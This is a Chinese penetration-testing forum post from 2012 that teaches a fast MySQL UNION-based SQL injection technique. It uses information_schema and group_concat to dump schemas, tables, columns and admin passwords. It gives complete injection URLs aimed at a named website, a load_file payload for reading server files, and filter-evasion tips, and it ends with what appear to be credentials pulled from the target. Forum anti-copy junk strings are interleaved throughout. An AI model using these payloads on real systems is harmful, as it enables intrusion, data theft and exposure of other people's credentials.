中国网络渗透测试联盟

标题: mysql注入高效方法 [打印本页]

---

作者: admin    时间: 2012-9-13 16:37
标题: mysql注入高效方法
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
但此方法大大提高了读取数据库的速度,此方法并非本人原创，原创出处是国外某牛人
. F+ u9 X4 I8 @% W  y* x

" z) W/ M  L  Q5 @4 S1 P优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
; i3 a0 ]8 Z) R( `( E/ u0 u7 y9 b" Z9 p$ g
1 K0 E0 h( V' D( V缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
2 I6 ~9 n4 T, U* I
0 P# n! V  E" {  G( j下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
5 m& e  S0 q  N8 g" {: p0 G在注入时根据实际情况作出变化 比如过滤了空格，使用/**/ ,  + 等等

+ F' l  E. R1 j& {http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17

读出所有库:
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
8 b* r# ]  B: C/ \* o5 q' N
! g- i' w" c% @$ E/ R9 h# \

读出所有表:
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()

读出所有表字段:
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
*/ (97,100,109,105,110)为admin的ascii码 依次类推
9 }" k# _6 S9 @
读出所有表字段里的内容:
. t. p$ ]: A; k& b& whttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin



) W5 `4 }# _# [3 a% d

- K- N* h) V( S4 V" f
6 B, ~& D, J8 I4 lhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
2 G% Y, h6 T  r% N7 I" b4 ?
+ w2 t( [7 V5 V  i0 \& B( X
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23

  T  R6 q! b$ _4 l$ d$ uhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23

6 v* g7 e* I8 q# O
6 c$ g0 m4 E3 V# _; ^+ @( |http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23

7 i, S7 v. I" f3 E. _; S" w
1 ~, U  l+ s% H/ j" C        webmaster:dzb521123,simlab:simadmin20043233

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2